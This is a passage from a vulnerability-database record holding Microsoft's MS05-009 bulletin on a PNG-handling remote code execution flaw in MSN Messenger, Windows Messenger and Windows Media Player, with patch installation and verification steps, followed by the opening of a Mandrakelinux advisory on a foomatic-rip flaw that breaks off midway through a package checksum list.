Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nIs the MSN Messenger 7.0 beta affected by this vulnerability?\r\nNo. This vulnerability was reported prior to the release of the MSN Messenger 7.0 beta, and is therefore already incorporated into that product version.\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nMSN Messenger implements the public lipng 1.2.5 version library that is recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics &#40;PNG&#41; format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAn attacker would likely seek to exploit this vulnerability by convincing a user to add them to their contacts list, and sending a specially crafted emoticon or display picture.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nYes. Customers running an affected version of MSN Messenger should install the updated version of MSN Messenger.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by updating the library used by MSN Messenger to one that correctly validates the PNG file being passed to it.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597 .\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\nTop of section\r\n Security Update Information \r\n\r\nInstallation Platforms and Prerequisites:\r\n\r\nFor information about the specific security update for your platform, click the appropriate link:\r\n\r\n Microsoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003 \r\n\r\nPrerequisites\r\nThis security update requires Windows Media Player 9 on Windows 2000 Service Pack 3 &#40;SP3&#41; or Service Pack 4 &#40;SP4&#41; or Windows XP Service Pack 1 &#40;SP1&#41; or Windows Server 2003.\r\n\r\nThe software that is listed has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode &#40;no user interaction or display&#41;\r\n\r\n /passive Unattended mode &#40;progress bar only&#41;\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Media Player 9 Series on Windows 2000:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Media Player 9 Series on Windows XP and Windows Server 2003:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the &#37;Windir&#37;&#92;$NTUninstallKB885492$&#92;Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode &#40;no user interaction or display&#41;\r\n\r\n /passive Unattended mode &#40;progress bar only&#41;\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes &#40;or later&#41; that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nFile Name Version Date Time Size \r\nWmp.dll\r\n 9.0.0.3250\r\n 04-Aug-2004\r\n 07:56\r\n 4,874,240\r\n \r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if any of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows Media Player&#92;wm885492\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 885492 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.2009 on Windows XP Service Pack 1 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows Messenger version 4.7.0.2009 &#40;when running on Windows XP Service Pack 1&#41;\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /Q Specifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n /Q:U Specifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n /Q:A Specifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\n\r\n /T: &lt;full path&gt; Specifies the target folder for extracting files.\r\n\r\n /C Extracts the files without installing them. If /T: path is not specified, you are prompted for a target folder.\r\n\r\n /C: &lt;Cmd&gt; Override Install Command defined by author. Specifies the path and name of the setup .inf or .exe file.\r\n\r\n /R:N Never restarts the computer after installation.\r\n\r\n /R:I Prompts the user to restart the computer if a restart is required, except when used with /Q:A.\r\n\r\n /R:A Always restarts the computer after installation.\r\n\r\n /R:S Restarts the computer after installation without prompting the user.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, and not force the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3, Windows 2000 Service Pack 4, Windows XP Service Pack 1, or Windows Server 2003:\r\n\r\nWindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes &#40;or later&#41; that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.2009 on Windows XP Service Pack 1:\r\n\r\nFile Name Version Date Time Size \r\nMsmsgs.exe\r\n 4.7.0.2010\r\n 16-Nov-2004\r\n 00:18\r\n 1,670,144\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by confirming that an is Installed DWORD value with a data value of 1 exists in the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Active Setup&#92;Installed Components&#92;{5945c046-1e7d-11d1-bc44-00c04fd912be}\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.3000 on Windows XP Service Pack 2 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft 4.7.0.3000 &#40;when running on Windows XP Service Pack 2&#41;\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode &#40;no user interaction or display&#41;\r\n\r\n /passive Unattended mode &#40;progress bar only&#41;\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFor Windows XP Service Pack 2: System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe is located in the &#37;Windir&#37;&#92;$NTUninstallKB887472$&#92;Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode &#40;no user interaction or display&#41;\r\n\r\n /passive Unattended mode &#40;progress bar only&#41;\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes &#40;or later&#41; that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.3000 on Windows XP Service Pack 2:\r\n\r\nFile Name Version Date Time Size Folder \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:24\r\n 1,694,208\r\n SP2GDR\r\n \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:21\r\n 1,694,208\r\n SP2QFE\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows XP&#92;SP3&#92;KB887472&#92;Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 5.0 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, or Windows XP Service Pack 2.\r\n\r\nInstallation Information\r\n\r\nThis security update is packaged using Windows Installer Version 3.0. For more information, see the product documentation.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes &#40;or later&#41; that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger 5.0 on Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, Windows XP Service Pack 2, or Windows XP Tablet PC Edition:\r\n\r\nFile Name Version Date Time Size \r\nmsmsgs.exe\r\n 5.1\r\n 05-Aug-2003\r\n 17:29\r\n 1,578,160\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\r\nTop of section\r\n\r\n MSN Messenger 6.1 or 6.2 \r\n\r\nPrerequisites\r\n\r\nThis security update requires MSN Messenger 6.1 or 6.2.\r\n\r\nRestart Requirement\r\n\r\nThis update may require you to restart your computer.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nVerifying Update Installation\r\n\r\nTo verify that a security update is installed on an affected system, please perform the following steps:\r\n\r\n1.\r\n Within MSN Messenger, Click Help, then About.\r\n \r\n2.\r\n Check the version number.\r\n \r\n\r\nIf the Version number reads 6.2.205 or above the update has been successfully installed.\r\n\r\nTop of section\r\nTop of section\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\r\n\u2022 Carlos Sarraute of Core Security Technologies for reporting the MSN Messenger PNG Processing Vulnerability &#40;CAN-2004-0597&#41;.\r\n \r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available from the following locations:\r\n\r\n\u2022 Security updates are available from the Microsoft Download Center. You can find them most easily by doing a keyword search for &quot;security_patch.&quot;\r\n \r\n\u2022 Updates for consumer platforms are available from the Windows Update Web site.\r\n \r\n\r\nSupport: \r\n\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n \r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n \r\n\r\nSecurity Resources: \r\n\r\n\u2022 The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n \r\n\u2022 Microsoft Software Update Services\r\n \r\n\u2022 Microsoft Baseline Security Analyzer &#40;MBSA&#41;\r\n \r\n\u2022 Windows Update\r\n \r\n\u2022 Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n \r\n\u2022 Office Update \r\n \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services &#40;SUS&#41;, administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server &#40;SMS&#41; delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and to perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, Microsoft Office Detection Tool and an Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool &#40;available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack&#41; to install these updates.\r\n\r\nDisclaimer: \r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\r\n\u2022 V1.0 &#40;February 8, 2005&#41;: Bulletin published\r\n \r\n", "modified": "2005-02-08T00:00:00", "published": "2005-02-08T00:00:00", "id": "SECURITYVULNS:DOC:7769", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7769", "title": "Microsoft Security Bulletin MS05-009 Vulnerability in PNG Processing Could Allow Remote Code Execution &#40;890261&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: printer-drivers\r\n Advisory ID: MDKSA-2004:094\r\n Date: September 15th, 2004\r\n\r\n Affected versions: 10.0, 9.2\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n The foomatic-rip filter, which is part of foomatic-filters package,\r\n contains a vulnerability that allows anyone with access to CUPS, local\r\n or remote, to execute arbitrary commands on the server. The updated\r\n packages provide a fixed foomatic-rip filter that prevents this kind\r\n of abuse.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0801\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n 5b60d06dd30d734ac047d3ee6f6dc772 10.0/RPMS/cups-drivers-1.1-138.2.100mdk.i586.rpm\r\n b054fe649f49aaf755d14b797b5b6601 10.0/RPMS/foomatic-db-3.0.1-0.20040828.1.1.100mdk.i586.rpm\r\n db087f03bd7c8725808e9b72ad328109 10.0/RPMS/foomatic-db-engine-3.0.1-0.20040828.1.1.100mdk.i586.rpm\r\n bc8d8726f556bf49d28dac6d60131b96 10.0/RPMS/foomatic-filters-3.0.1-0.20040828.1.1.100mdk.i586.rpm\r\n 36a87460cc5d6ea62a90b73536e904f2 10.0/RPMS/ghostscript-7.07-19.2.100mdk.i586.rpm\r\n dd3a8164ed4959f87d8a737f7bc84b01 10.0/RPMS/ghostscript-module-X-7.07-19.2.100mdk.i586.rpm\r\n b584cf81006355ccd974cf8845c383ca 10.0/RPMS/gimpprint-4.2.7-2.2.100mdk.i586.rpm\r\n 2a680b3686870b96498a6c2fb0aa684b 10.0/RPMS/libgimpprint1-4.2.7-2.2.100mdk.i586.rpm\r\n e116225a8e807e81e2f94bfa5bdfd2a8 10.0/RPMS/libgimpprint1-devel-4.2.7-2.2.100mdk.i586.rpm\r\n 0de919bcb4588874ce8937257af9c699 10.0/RPMS/libijs0-0.34-76.2.100mdk.i586.rpm\r\n 1b44c0ef21bea8d59ecba973b681f0c0 10.0/RPMS/libijs0-devel-0.34-76.2.100mdk.i586.rpm\r\n 152791cb0b54d88d66870dd190007709 10.0/RPMS/printer-filters-1.0-138.2.100mdk.i586.rpm\r\n 94849ae591daa6abb27c329262d34510 10.0/RPMS/printer-testpages-1.0-138.2.100mdk.i586.rpm\r\n 817bb3003924bda9143a4ba9fc41f07b 10.0/RPMS/printer-utils-1.0-138.2.100mdk.i586.rpm\r\n 252ce79ceeb44363fcca69e8fae3124f 10.0/SRPMS/printer-drivers-1.0-138.2.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n f77b65e84043e7e426127724e6c926fd amd64/10.0/RPMS/cups-drivers-1.1-138.2.100mdk.amd64.rpm\r\n 5f74d92859cd3423ffa69e88dfb397fb amd64/10.0/RPMS/foomatic-db-3.0.1-0.20040828.1.1.100mdk.amd64.rpm\r\n cbc7f870d50c30cdaaa3318ffd9f7cfa amd64/10.0/RPMS/foomatic-db-engine-3.0.1-0.20040828.1.1.100mdk.amd64.rpm\r\n 513edd72b47ea666813d98bf9572ae10 amd64/10.0/RPMS/foomatic-filters-3.0.1-0.20040828.1.1.100mdk.amd64.rpm\r\n 1656f00628486bddffefc924acdb4bfe amd64/10.0/RPMS/ghostscript-7.07-19.2.100mdk.amd64.rpm\r\n 4fbad78a6df7915e83d9cb20a6d59939 amd64/10.0/RPMS/ghostscript-module-X-7.07-19.2.100mdk.amd64.rpm\r\n ad6683d164413b5ca4571a40e78df9f3 amd64/10.0/RPMS/gimpprint-4.2.7-2.2.100mdk.amd64.rpm\r\n f9745491ae1a8f0634107cd7f41d76b2 amd64/10.0/RPMS/lib64gimpprint1-4.2.7-2.2.100mdk.amd64.rpm\r\n 0c7f9f7109ef86406c0d32191aa77fc2 amd64/10.0/RPMS/lib64gimpprint1-devel-4.2.7-2.2.100mdk.amd64.rpm\r\n d8b8c565cb72e876aceda04de4ad2832 amd64/10.0/RPMS/lib64ijs0-0.34-76.2.100mdk.amd64.rpm\r\n ed95b407652ab7064837399003bb9553 amd64/10.0/RPMS/lib64ijs0-devel-0.34-76.2.100mdk.amd64.rpm\r\n 462a427f75ccf5d024c793eb829ae025 amd64/10.0/RPMS/printer-filters-1.0-138.2.100mdk.amd64.rpm\r\n bcad49c7a9063a7856473b1ce969e36b amd64/10.0/RPMS/printer-testpages-1.0-138.2.100mdk.amd64.rpm\r\n 37339dff70409896959a6f4d4b8af1e7 amd64/10.0/RPMS/printer-utils-1.0-138.2.100mdk.amd64.rpm\r\n 252ce79ceeb44363fcca69e8fae3124f amd64/10.0/SRPMS/printer-drivers-1.0-138.2.100mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n e46b265555a2075d363d746933e88870 9.2/RPMS/cups-drivers-1.1-116.1.92mdk.i586.rpm\r\n f2e8df86c2cc434c6b3a2d788b22069b 9.2/RPMS/foomatic-db-3.0-1.20030908.3.1.92mdk.i586.rpm\r\n 452cc2b7a3d3dfae90818f2c70112c75 9.2/RPMS/foomatic-db-engine-3.0-1.20030908.3.1.92mdk.i586.rpm\r\n 4d3926f1a28c1d958e453d01a1708811 9.2/RPMS/foomatic-filters-3.0-1.20030908.3.1.92mdk.i586.rpm\r\n b83e8b68601c4c576e4354229f541092 9.2/RPMS/ghostscript-7.07-0.12.1.92mdk.i586.rpm\r\n ea2f04d7cb9a17ed26e5c0c71711c54c 9.2/RPMS/ghostscript-module-X-7.07-0.12.1.92mdk.i586.rpm\r\n 488ad952dc1560ce2b2eba223f692ae1 9.2/RPMS/gimpprint-4.2.5-30.1.92mdk.i586.rpm\r\n e491c8a7e4fc6edbf205c4539d50806d 9.2/RPMS/libgimpprint1-4.2.5-30.1.92mdk.i586.rpm\r\n 